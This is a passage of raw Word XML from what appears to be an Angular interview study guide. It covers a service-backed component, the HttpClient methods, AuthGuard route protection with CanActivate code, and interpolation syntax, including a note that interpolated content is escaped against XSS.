    <w:p w14:paraId="00BE5B4C"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selector: 'app-employee',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C1226A"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emplateUrl: './employee.component.html'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09521201"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2C897902"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EmployeeComponent implements OnInit {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F40C3E" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8685CC"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employees: any[] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC7A815" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2287FBF8"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constructor(private employeeService: EmployeeService) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA1C14" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B7413F1"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ngOnInit() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2DD4E0"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his.employeeService.getEmployees().subscribe(data =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4C646D"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his.employees = data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B57546"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2160E9CE"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1DF6427A"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0B611678" w14:textId="77777777" w:rsidR="00E72E77"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67B7BBE">
          <v:rect id="_x0000_i3503" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A7AC66" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77"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Supported HTTP Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098D7E61"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lastRenderedPageBreak/>
        <w:t>http.get&lt;T&gt;()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143600FE"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http.post&lt;T&gt;()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D0DB20"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http.put&lt;T&gt;()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45734612"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http.delete&lt;T&gt;()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72540CA8" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E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http.patch&lt;T&gt;()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A6A3EB" w14:textId="2D031D4F" w:rsidR="00FC4E71" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FC4E71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="35FC5985">
          <v:rect id="_x0000_i3504" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6896BE" w14:textId="332841ED" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB6447">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="863" w:name="_Toc196308343"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is authguard in angular</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="863"/>
    </w:p>
    <w:p w14:paraId="2994AC9D" w14:textId="158B45AB" w:rsidR="00231977" w:rsidRPr="003C7C02" w:rsidRDefault="00231977" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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What is AuthGuard in Angular?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AEC220"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AuthGuard is a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>route guard</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Angular used to </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>protect routes</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from unauthorized access. It determines whether a route can be activated (navigated to) based on some logic, typically user authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165A1D38" w14:textId="77777777" w:rsidR="00231977"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A1F5E43">
          <v:rect id="_x0000_i3505" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1FADC9" w14:textId="77777777" w:rsidR="00231977" w:rsidRPr="003C7C02" w:rsidRDefault="00231977"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5AB396"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You want to restrict access to certain pages (e.g., /dashboard) unless the user is logged in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA86AD7" w14:textId="77777777" w:rsidR="00231977"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06FE683">
          <v:rect id="_x0000_i3506" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E17A2C8" w14:textId="77777777" w:rsidR="00231977" w:rsidRPr="003C7C02" w:rsidRDefault="00231977"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How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCCA2FA"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You implement the CanActivate interface in a guard class and return true (allow access) or false (deny access), or an Observable&lt;boolean&gt; / Promise&lt;boolean&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5495463B" w14:textId="77777777" w:rsidR="00231977"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EB15F2">
          <v:rect id="_x0000_i3507" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB43779" w14:textId="77777777" w:rsidR="00231977" w:rsidRPr="003C7C02" w:rsidRDefault="00231977"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Steps to Use AuthGuard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C10855" w14:textId="77777777" w:rsidR="00231977" w:rsidRPr="003C7C02" w:rsidRDefault="00231977"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 Generate Guard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59696398"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ng generate guard auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1E9955" w14:textId="77777777" w:rsidR="00231977" w:rsidRPr="003C7C02" w:rsidRDefault="00231977"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2. Implement Guard Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FED26ED"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 Injectable } from '@angular/core';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FB0BCA"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 CanActivate, Router } from '@angular/router';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25003F58"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 AuthService } from './auth.service';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158AC938" w14:textId="77777777" w:rsidR="00231977" w:rsidRPr="003C7C02" w:rsidRDefault="00231977" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0856304E"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njectable({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D87D455"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providedIn: 'root'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE9C355"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38F7507F"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AuthGuard implements CanActivate {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D7EFF5" w14:textId="77777777" w:rsidR="00231977" w:rsidRPr="003C7C02" w:rsidRDefault="00231977" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311D38FC"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constructor(private authService: AuthService, private router: Router) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491FF11E" w14:textId="77777777" w:rsidR="00231977" w:rsidRPr="003C7C02" w:rsidRDefault="00231977" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6971E702"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canActivate(): boolean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B83322"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if (this.authService.isLoggedIn()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228E7F69"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return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBAB3BD"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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488E3645"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his.router.navigate(['/login']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C4E264"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return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262DCA55"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45B7D49A"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3863FADA"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6E9B4E0A" w14:textId="77777777" w:rsidR="00231977" w:rsidRPr="003C7C02" w:rsidRDefault="00231977"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3. Apply Guard to Routes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570DD576"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st routes: Routes = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C2E536"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 path: 'dashboard', component: DashboardComponent, canActivate: [AuthGuard] },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E01E2F"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 path: 'login', component: LoginComponent }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF2DB8C"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5EDD680B" w14:textId="77777777" w:rsidR="00231977"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8B59D0A">
          <v:rect id="_x0000_i3508" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EED5445" w14:textId="77777777" w:rsidR="00231977" w:rsidRPr="003C7C02" w:rsidRDefault="00231977"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w:t>
      </w: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Guard Interfaces in Angular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C6D8F3"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anActivate – Prevent access to a route.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647D9BBF"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anActivateChild – Prevent access to child routes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CCD470"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anLoad – Prevent lazy-loaded modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FEB5A9" w14:textId="77777777" w:rsidR="00231977" w:rsidRPr="003C7C02" w:rsidRDefault="00231977"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anDeactivate – Prevent leaving a route (unsaved changes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A917DB" w14:textId="30B9319A" w:rsidR="00FC4E71" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FC4E71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="28F3EC33">
          <v:rect id="_x0000_i3509" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2CB2AF" w14:textId="36671351" w:rsidR="00A976FD" w:rsidRPr="00CE4B95" w:rsidRDefault="003B1204">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="864" w:name="_Toc196308344"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is interpolation in angular</w:t>
      </w:r>
      <w:r w:rsidR="00A976FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="864"/>
    </w:p>
    <w:p w14:paraId="5513074D" w14:textId="0C8DDCBC" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Interpolation</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Angular is a technique used to </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>display dynamic data</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the component class into the HTML template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560BF65E" w14:textId="77777777" w:rsidR="00D57784"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9BA973B">
          <v:rect id="_x0000_i3510" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F76A2A" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B083F4" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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expression }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC31868" w14:textId="77777777" w:rsidR="00D57784"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6488740">
          <v:rect id="_x0000_i3511" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8C35C8" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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How it Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF817FE" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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Angular evaluates the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>expression inside {{ }}</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and renders the result in the DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBD390C" w14:textId="77777777" w:rsidR="00D57784"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7993C5">
          <v:rect id="_x0000_i3512" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05427008" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D0A13F" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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app.component.ts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC6CC86" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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AppComponent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA0F3F7" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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itle = 'Angular Basics';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC28EB" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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057A7F4A" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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app.component.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4771EB09" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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lt;h1&gt;{{ title }}&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7852981A" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A20380" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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Angular Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496D0843" w14:textId="77777777" w:rsidR="00D57784"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26A729">
          <v:rect id="_x0000_i3513" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E2C61B" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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You Can Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D6FCDB" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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Variables: {{ username }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AF51EB" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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Method calls: {{ getUserName() }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE6A805" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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ressions: {{ 10 + 20 }}, {{ name.toUpperCase() }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C8A734" w14:textId="77777777" w:rsidR="00D57784"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BE7AB63">
          <v:rect id="_x0000_i3514" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C33221" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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You Cannot Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50671DB0" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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Statements like if, for, while</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEAD2F7" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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Assignments like =, ++, --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AC0208" w14:textId="77777777" w:rsidR="00D57784"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1A6A01F">
          <v:rect id="_x0000_i3515" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED6BE81" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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Security Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F572D48" w14:textId="77777777" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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Angular </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>escapes</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interpolated content to prevent XSS attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623CE640" w14:textId="52CBCC9B" w:rsidR="00FC4E71" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FC4E71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="4586788E">
          <v:rect id="_x0000_i3516" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7394C8BE" w14:textId="2A9C6E07" w:rsidR="00A976FD" w:rsidRPr="00CE4B95" w:rsidRDefault="00787882">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="865" w:name="_Toc196308345"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to create components in angular</w:t>
      </w:r>
      <w:r w:rsidR="00A976FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="865"/>
    </w:p>
    <w:p w14:paraId="79B0CD44" w14:textId="5553AC1F" w:rsidR="00001CEE" w:rsidRPr="003C7C02" w:rsidRDefault="00001CEE" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
